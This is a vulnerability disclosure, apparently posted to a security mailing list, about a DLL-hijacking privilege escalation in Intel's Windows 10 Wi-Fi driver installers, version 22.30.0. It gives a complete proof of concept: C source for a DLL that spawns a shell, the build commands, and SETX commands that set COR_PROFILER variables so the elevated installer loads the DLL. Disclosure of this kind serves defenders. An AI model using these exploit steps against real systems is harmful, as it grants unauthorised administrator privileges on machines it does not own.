Authored by Stefan Kanthak

Windows 10 Wi-Fi Drivers For Intel Wireless Adapters version 22.30.0 suffer from a privilege escalation vulnerability.

Hi @ll,

the executable installers version 22.30.0 (Latest), published 2/23/2021,
for the "Windows® 10 Wi-Fi Drivers for Intel® Wireless Adapters",
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>,
available from
<https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters>
are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH
local escalation of privilege.


CVSS 3.0 score: 8.2 (High)
CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H


Demonstration:
~~~~~~~~~~~~~~

0. Log on with an arbitrary user account.

1. Save the following source as poc.c in an arbitrary directory:

--- poc.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <[email protected]>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

const STARTUPINFO si = {sizeof(si)};

__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule,
DWORD dwReason,
CONTEXT *lpContext)
{
WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";

PROCESS_INFORMATION pi;
#if 0
if (dwReason != DLL_PROCESS_ATTACH)
return FALSE;
#endif
if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}

return TRUE;
}
--- EOF ---

2. Start the command prompt of the 32-bit Windows Software Development Kit,
then run the following command lines to compile poc.c and link it as
poc.dll:

CL.exe /Zl /W4 /Ox /GAFy /c poc.c
LINK.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /OPT:REF /RELEASE /SUBSYSTEM:Windows poc.obj
kernel32.lib

ALTERNATIVE for steps 1 and 2:

2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
and save it as poc.dll in an arbitrary directory.

See <https://skanthak.homepage.t-online.de/sentinel.html> for its
documentation, and
<https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html>
for an example how to use it.

3. Logon with the user account created during Windows setup.

4. Download
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>
and save them in an arbitrary directory.

5. Start a command prompt (UNELEVATED!) and run the following command lines
(replace <directory> with the pathname of the directory where you built
or saved poc.dll):

SETX.exe COR_ENABLE_PROFILING 1
SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
SETX.exe COR_PROFILER_PATH <directory>poc.dll

JFTR: this is just one method to set these environment variables without
the need to elevate!

6. Execute WiFi_22.30.0_Driver32_Win10.exe and WiFi_22.30.0_Driver64_Win10.exe
per double-click, acknowledge the UAC prompt, then admire the console
windows showing the output of WHOAMI.exe running elevated.


stay tuned, and far away from Intel's vulnerable crap!
Stefan Kanthak